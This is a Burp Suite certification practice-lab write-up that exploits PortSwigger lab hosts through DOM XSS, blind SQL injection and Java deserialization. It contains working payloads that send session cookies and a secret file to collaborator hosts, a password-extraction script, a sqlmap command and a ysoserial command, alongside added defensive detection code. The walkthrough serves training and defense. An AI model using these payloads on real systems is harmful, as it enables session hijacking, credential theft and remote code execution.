_______________________________________

BURPSUITE CERTIFIED PRACTITIONER EXAM


Practice Lab 1

Leonardo Tamiano (Hexdump)


_______________________________________

Table of Contents
_________________

1. Step 1 - DOM XSS to steal session cookie
2. Step 2 - Blind SQLi to obtain administrator password
3. Step 3 - Insecure Deserialization to read secret

1 Step 1 - DOM XSS to steal session cookie
==========================================

DOM XSS on the search functionality can be triggered with the following
payload:
,----
| "};alert(1)//
`----

There is a basic filtering mechanism that blocks payloads which fetch
`document.cookie'. To bypass it, simply wrap the code with `eval' and
`atob':
,----
| "};eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))//
`----

Code to steal the user's cookie (two collaborator hosts were used during
the lab; either line produces the base64 used below):

,----
| btoa("fetch('https://eq84n6beriq08tqwsecr8wj73y9pxhl6.oastify.com', { method: 'POST', mode: 'no-cors', body:document.cookie });")
| btoa("fetch('https://tolutj74wjsasnrdhdw4s2zmldr4fu3j.oastify.com', { method: 'POST', mode: 'no-cors', body:document.cookie });")
`----

Final DOM XSS payload:

,----
| "};eval(atob('ZmV0Y2goJ2h0dHBzOi8vdG9sdXRqNzR3anNhc25yZGhkdzRzMnptbGRyNGZ1M2oub2FzdGlmeS5jb20nLCB7IG1ldGhvZDogJ1BPU1QnLCBtb2RlOiAnbm8tY29ycycsIGJvZHk6ZG9jdW1lbnQuY29va2llIH0pOw'))//
`----

Send this to the victim:

,----
| <script>
| document.location="https://0afd0092044ff06780e5084e000000aa.web-security-academy.net/?SearchTerm=%22%7D%3Beval%28atob%28%27ZmV0Y2goJ2h0dHBzOi8vdG9sdXRqNzR3anNhc25yZGhkdzRzMnptbGRyNGZ1M2oub2FzdGlmeS5jb20nLCB7IG1ldGhvZDogJ1BPU1QnLCBtb2RlOiAnbm8tY29ycycsIGJvZHk6ZG9jdW1lbnQuY29va2llIH0pOw%27%29%29%2F%2F"
| </script>
`----

----------------------------------------------------------------------

Stolen victim cookie:

,----
| fpHJEUxrA2sErKVEbg1ut4cxI70eJLW5
`----
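From the defender's side, the bypass above works because a filter that only inspects the raw search term never sees what `atob' will decode at runtime. The following added example (not part of the original write-up) shows the check such a filter needs: pull `SearchTerm' from the URL, decode every `atob('...')' literal the way a browser does (padding optional), and look for sinks in the decoded text as well. The host in `SAMPLE_URL' and the function names are constructed for this example.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Sources and sinks whose presence in the search term should raise an alert.
SUSPICIOUS = ("document.cookie", "fetch(", "xmlhttprequest", "document.location")
# atob('...') literal; '=' padding is optional because browsers accept its absence.
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def decode_atob_arg(arg: str) -> str:
    """Decode a base64 literal the way atob() does: pad to a multiple of 4 first."""
    padded = arg + "=" * (-len(arg) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return ""

def inspect_search_term(term: str) -> dict:
    """Report suspicious tokens in the raw term and, separately, inside any
    atob() payload; a filter that stops at the raw string misses the second set."""
    low = term.lower()
    findings = {"raw": [s for s in SUSPICIOUS if s in low], "decoded": []}
    for match in ATOB_RE.finditer(term):
        decoded = decode_atob_arg(match.group(1)).lower()
        findings["decoded"] += [s for s in SUSPICIOUS if s in decoded]
    return findings

def search_term_from_url(url: str) -> str:
    """Extract SearchTerm by hand: parse_qs may split on ';' in older Pythons,
    which would cut the payload right after its '";' prefix."""
    query = url.partition("?")[2]
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "SearchTerm":
            return unquote(value)
    return ""

def inspect_url(url: str) -> dict:
    return inspect_search_term(search_term_from_url(url))

# Constructed sample mirroring the lab's URL shape, with a placeholder host and
# the unpadded alert(document.cookie) payload from the section above.
SAMPLE_URL = ("https://lab.example/?SearchTerm=%22%7D%3Beval%28atob%28%27"
              "YWxlcnQoZG9jdW1lbnQuY29va2llKQ%27%29%29%2F%2F")
```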

2 Step 2 - Blind SQLi to obtain administrator password
======================================================

Within the `advanced search' feature, we find an SQL injection within
the `organize_by' parameter.

Payload to determine the length of the administrator password:

,----
| Author||(SELECT CASE WHEN LENGTH(password) > 15 THEN pg_sleep(2) ELSE pg_sleep(0) END FROM users WHERE username='administrator')
`----

Payload to extract the administrator password one character at a time
(PostgreSQL SUBSTRING positions are 1-based, so the first character is
at position 1):

,----
| Author||(SELECT CASE WHEN SUBSTRING(password,1,1)='a' THEN pg_sleep(2) ELSE pg_sleep(0) END FROM users WHERE username='administrator')
`----

----------------------------------------------------------------------

Script to automate the attack (requests go through Burp on 127.0.0.1:8080;
a 2 s timeout is treated as the CASE branch having slept):

,----
| import requests
| from urllib3.exceptions import InsecureRequestWarning
|
| ALPHABET = "0123456789" + "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
| # --------------------------
|
| def sql2bool(sql_payload):
|     """True when the injected CASE makes the server sleep past the timeout."""
|     url = "https://0a4d00080460079481213e9800280092.web-security-academy.net/advanced_search"
|     params = {
|         "SearchTerm": "a",
|         "organize_by": sql_payload,
|         "blogArtist": "c"
|     }
|     headers = {
|         "Cookie": "_lab=46%7cMCwCFCS9bCUEz2Ed4jmTpsblEQG5ew33AhQLGVRL8qcd0T5tzLrpYFUrElHue2lWjzk6ELrZ9JRtohXCdy6ulwiitAr%2bZU6qJtK%2bv40O%2bEMHsfQzNkbDUmkcME4iy%2fNPuYDeQ%2fhRptx01zR%2f1NRfSalrs1%2bRsGkI5%2b7cvJwjn1BYzqs%3d; session=fpHJEUxrA2sErKVEbg1ut4cxI70eJLW5"
|     }
|
|     try:
|         requests.get(url, headers=headers, params=params, timeout=2,
|                      proxies={"https": "127.0.0.1:8080"}, verify=False)
|         return False
|     except Exception:
|         # requests.exceptions.ReadTimeout: the pg_sleep(2) branch fired
|         return True
|
| # --------------------------
|
| def get_password():
|     username = "administrator"
|     password_length = 16
|
|     print(f"[INFO] - Password for username: {username} has {password_length} length")
|     print(f"[INFO] - Password for {username} is ", end="")
|     password = ""
|     # SUBSTRING positions are 1-based; the loop below starts at position 15
|     for i in range(15, password_length+1):
|         for c in ALPHABET:
|             sql_payload = f"Author||(SELECT CASE WHEN SUBSTRING(password,{i},1)='{c}' THEN pg_sleep(2) ELSE pg_sleep(0) END FROM users WHERE username='administrator')"
|             if sql2bool(sql_payload):
|                 password += c
|                 print(c, end="", flush=True)  # print each character as it is found
|                 break
|     print("\n", end="")
|     return password
|
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
| get_password()
`----

----------------------------------------------------------------------

Exploit with `sqlmap':

,----
| sqlmap -u "https://0a330075048e756080dbb75400610083.web-security-academy.net/advanced_search?SearchTerm=&organize_by=*&blogArtist=" --cookie="_lab=46%7cMCwCFEk%2bONwqfNu0e4LqBFv1LBJ3nDtDAhRxtsaDX13ZHiTOAZC76VrJ4hRc%2bKNVnuH1WxSpguvCAxEXk5J5CU1RF8zdmKZ1Cvqjk8h6O6nnbA7AgGqoL1W7dfe8xb%2fBscrxazr7%2bCBjLwXg93hfH9Fs34ibOVdbAzv46FZDNz8KZrY%3d;session=rEIPSZruwu1EfXOZ339ehswlfg098JAM" -p 'organize_by' -D public -T users --dump --batch --level=5 --risk=3
`----
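Two things a defender takes from this step: the `organize_by' value almost certainly ends up in an ORDER BY clause, which cannot be bound as a query parameter, so the fix is an allowlist rather than escaping; and every probe above carries a sleep primitive that is easy to spot in access logs, especially next to a 2 s response time. The added example below (not from the original write-up) shows both; the column mapping, the log format and the sample lines are constructed, and the sleep-in-ORDER-BY assumption is mine.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Assumed mapping from the user-facing organize_by value to a real column; the
# lab's schema is not known, so these column names are placeholders.
SORT_COLUMNS = {"Author": "author", "Title": "title", "Date": "published"}

def build_search_sql(organize_by: str) -> Optional[str]:
    """An ORDER BY column cannot be a bound parameter, so the only safe option
    is an allowlist lookup: unknown values are rejected, never interpolated."""
    column = SORT_COLUMNS.get(organize_by)
    if column is None:
        return None
    # The search term itself is bound to the %s placeholder by the caller.
    return f"SELECT title, author FROM posts WHERE title ILIKE %s ORDER BY {column}"

# Markers of the time-based and inference probes used in the payloads above.
TIME_PROBE = re.compile(r"pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay|benchmark\s*\(", re.I)
INFERENCE = re.compile(r"case\s+when|substring\s*\(|\blength\s*\(", re.I)
# Constructed access-log format: client, request line, status, response time in ms.
LOG_RE = re.compile(r'^(?P<ip>\S+) "GET (?P<path>\S+) HTTP/1\.1" \d{3} (?P<ms>\d+)$')

def flag_blind_sqli(log_lines):
    """Return (ip, response_ms, indicators) for requests whose decoded query
    carries a sleep primitive; a 2 s+ response next to it is the strongest signal."""
    hits = []
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        query = unquote(match.group("path").partition("?")[2])
        indicators = []
        if TIME_PROBE.search(query):
            indicators.append("sleep")
        if INFERENCE.search(query):
            indicators.append("inference")
        if "sleep" in indicators:
            hits.append((match.group("ip"), int(match.group("ms")), indicators))
    return hits

# Constructed sample: a normal search and the length probe from this section.
SAMPLE_LOG = [
    '10.0.0.5 "GET /advanced_search?SearchTerm=a&organize_by=Author&blogArtist=c HTTP/1.1" 200 38',
    '10.0.0.9 "GET /advanced_search?SearchTerm=a&organize_by=Author%7C%7C%28SELECT%20CASE'
    '%20WHEN%20LENGTH%28password%29%3E15%20THEN%20pg_sleep%282%29%20ELSE%20pg_sleep%280%29'
    '%20END%20FROM%20users%20WHERE%20username%3D%27administrator%27%29&blogArtist=c HTTP/1.1" 200 2041',
]
```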

3 Step 3 - Insecure Deserialization to read secret
==================================================

Once logged in as administrator, we obtain the cookie `admin-prefs'.
This cookie is deserialized server-side, which can be used to trigger
RCE on the server.

Note that the payload must first be gzipped.

Payload with `ysoserial' (gzipped, then base64-encoded):

,----
| java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar CommonsCollections3 'curl --data @/home/carlos/secret https://skgihk5slwke27kams652adlxc33rzfo.oastify.com/?' | gzip | base64 -w0 > out
`----
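The encoding chain here (serialized object, gzip, base64, cookie) is also what a reviewer or a WAF rule would unwrap to decide whether a cookie like `admin-prefs' carries a Java serialization stream at all, which is the condition that makes this step possible. The following added check is not part of the original write-up: it strips URL-encoding, base64 and gzip in turn and looks for the `java.io.ObjectOutputStream' header bytes; the cookie samples are constructed in the block rather than captured from the lab.

```python
import base64
import binascii
import gzip
import zlib
from urllib.parse import unquote

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"  # java.io.ObjectOutputStream header
GZIP_MAGIC = b"\x1f\x8b"

def unwrap_cookie(value: str) -> bytes:
    """Reverse the layers the lab applies to admin-prefs: URL-encoding (cookies
    often carry %3D for '='), base64, then gzip. Returns b'' if not base64."""
    text = unquote(value)
    try:
        raw = base64.b64decode(text + "=" * (-len(text) % 4), validate=True)
    except (binascii.Error, ValueError):
        return b""
    if raw.startswith(GZIP_MAGIC):
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError, zlib.error):
            return raw  # truncated or corrupt gzip: keep what we have
    return raw

def is_java_serialized(value: str) -> bool:
    """True when the unwrapped cookie is a Java serialization stream."""
    return unwrap_cookie(value).startswith(JAVA_STREAM_MAGIC)

def classify_cookie(name: str, value: str) -> str:
    """One-line verdict for a cookie, suitable for a review checklist or a log."""
    inner = unwrap_cookie(value)
    if inner.startswith(JAVA_STREAM_MAGIC):
        return f"{name}: Java serialized object ({len(inner)} bytes) - reject"
    if inner:
        return f"{name}: opaque/base64 ({len(inner)} bytes)"
    return f"{name}: not base64"

# Constructed samples, built here rather than captured from the lab.
def wrap(payload: bytes, compress: bool = True) -> str:
    data = gzip.compress(payload) if compress else payload
    return base64.b64encode(data).decode()

SERIALIZED_GZ = wrap(JAVA_STREAM_MAGIC + b"sr\x00\x0bAdminPrefs")
SERIALIZED_PLAIN = wrap(JAVA_STREAM_MAGIC + b"sr", compress=False)
JSON_PREFS = wrap(b'{"theme":"dark"}')
```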
